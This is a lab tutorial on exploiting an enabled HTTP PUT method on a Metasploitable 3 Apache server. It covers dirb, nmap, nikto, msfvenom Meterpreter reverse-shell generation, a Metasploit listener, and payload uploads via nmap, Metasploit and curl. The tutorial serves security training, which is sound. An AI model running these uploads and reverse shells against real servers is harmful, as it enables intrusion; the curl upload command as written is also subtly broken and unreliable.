Metasploitable 3: Exploiting HTTP PUT

In this hacking tutorial we will be exploiting the HTTP PUT method on one of the Metasploitable 3 webservers to upload files to the webserver. If the HTTP PUT method is enabled on the webserver it can be used to upload a specified resource to the target server, such as a web shell, and execute it. In this tutorial we will look at how to determine if the HTTP PUT method is enabled and we’ll be using several different methods to upload a Meterpreter reverse shell.

For this tutorial we assume that you have Metasploitable 3 installed. If you haven’t installed Metasploitable 3 yet than follow the how to install how to install the Metasploitable 3 tutorial.

Determining allowed HTTP methods

First we will learn how we can determine which HTTP methods are allowed and find out if HTTP PUT is one of them. From the Nmap port scan we found out that Metasploitable is running Microsoft IIS on port 80 and Apache httpd 2.2.21 on port 8585. In this tutorial we will target the Apache server on port 8585.

Discovering webserver directories with Dirb

The next step is to find out what directories are present on this webserver. A nice tool that brute forces directories on a webserver is dirb. When we run dirb on the Apache webserver with the following command we find a directory named ‘uploads’:

dirb http://172.28.128.3:8585

Nmap: Determining allowed HTTP methods

We can use several methods to determine if we’re allowed to upload files to this directory with the HTTP PUT method. Testing for allowed HTTP methods can be done with the OPTIONS HTTP method which provides a list of allowed methods. But as this may not always work an easier way is to run the Nmap http-methods script on the uploads directory. When we run the following command see that HTTP PUT is enabled for the uploads directory:

nmap –script http-methods –script-args http-methods.url-path=’/uploads’,http-methods.test-all -p 8585 172.28.128.3

As we can see the webserver allows us to upload files to the uploads directory and even delete files.

Nikto

We can also use the web vulnerability scanner Nikto to determine vulnerabilities in the webserver. If the HTTP PUT method is enabled than Nikto will indicate this as following:

nikto -host http://172.28.128.3:8585/uploads

Exploiting HTTP PUT for shell

Now that we know we can upload files to this directory let’s have a look at a few different ways to do this. In the next steps of this tutorial we will upload a Meterpreter PHP reverse shell script to the webserver and execute it. We will demonstrate how to upload files with Nmap, Metasploit and Curl.

Nmap HTTP PUT Meterpreter shell

Let’s with creating a PHP Meterpreter reverse shell payload with msfvenom first by running the following command:

msfvenom -p php/meterpreter/reverse_tcp lhost=[Listening host IP] lport=4444 -f raw > /root/meterpreter.php

Modify the file to make sure that the scripts contains the proper PHP open and closing tags:

Next we’ll setup the listener in Metasploit to intercept the reverse shell with the following commands:

use exploit/multi/handler

set payload php/meterpreter/reverse_tcp

// Be sure to set the payload here otherwise you might get errors

set lhost [Listening host IP]

set lport 4444

run

Nmap HTTP-PUT script

Now that we’ve created the Meterpreter payload and setup our listener in Metasploit we will use Nmap to upload the Meterpreter payload to the webserver. Execute the following command to run the Nmap http-put script:

nmap -sV –script http-put –script-args http-put.url=’/uploads/meterpreter.php’,http-put.file=’/root/Desktop/meterpreter.php’ -p 8585 [Target IP]

As we can see on the screenshot the meterpreter.php has been successfully created. Because port 8585 is not defined as an http service port in the nmap services file it is important that we run a service scan with -sV flag. Otherwise script will fail in uploading the file and only display an open port and unknown service.

Metasploit HTTP PUT Auxiliary module

We can also use the Metasploit auxiliary module HTTP PUT to upload a file to the uploads web directory. In the following steps we will be uploading the PHP Meterpreter reverse shell script that we’ve created earlier in this tutorial and intercept the Meterpreter reverse shell with the multi handler module. Run the following commands:

msfconsole

use auxiliary/scanner/http/http_put

set rhosts [rhost]

set rport 8585

set path /uploads

set filename meterpreter.php

set filedata file://root/Desktop/meterpreter.php

The next step is to setup the multi handler module again to intercept the reverse shell connection and execute the auxiliary module with the run command:

Metasploit is showing us that the upload has failed, but when we check the uploads directory on the webserver we can see that the file upload did go through:

All that remains is to execute the PHP script and receive a reverse shell from the Metasploitable 3 machine on our multi handler:

HTTP PUT with Curl

Finally we can also upload the Meterpreter payload with a single command using Curl:

curl -i -X PUT -H “Content-Type: text/plain; charset=utf-8” -d “/root/Desktop/meterpreter.php” http://172.28.128.3:8585/uploads/meterpreter.php

As we can see the meterpreter.php file has been successfully uploaded to the webserver.

Lessons Learned

In this tutorial we have learned how to assess a webserver for uploading files using the HTTP PUT method. We have discovered that the uploads directory on port 8585 on the Metasploitable 3 machines allows us to upload malicious files and execute them in the context of the webserver. We have used 3 different tools to upload the files; Nmap, Metasploit and Curl.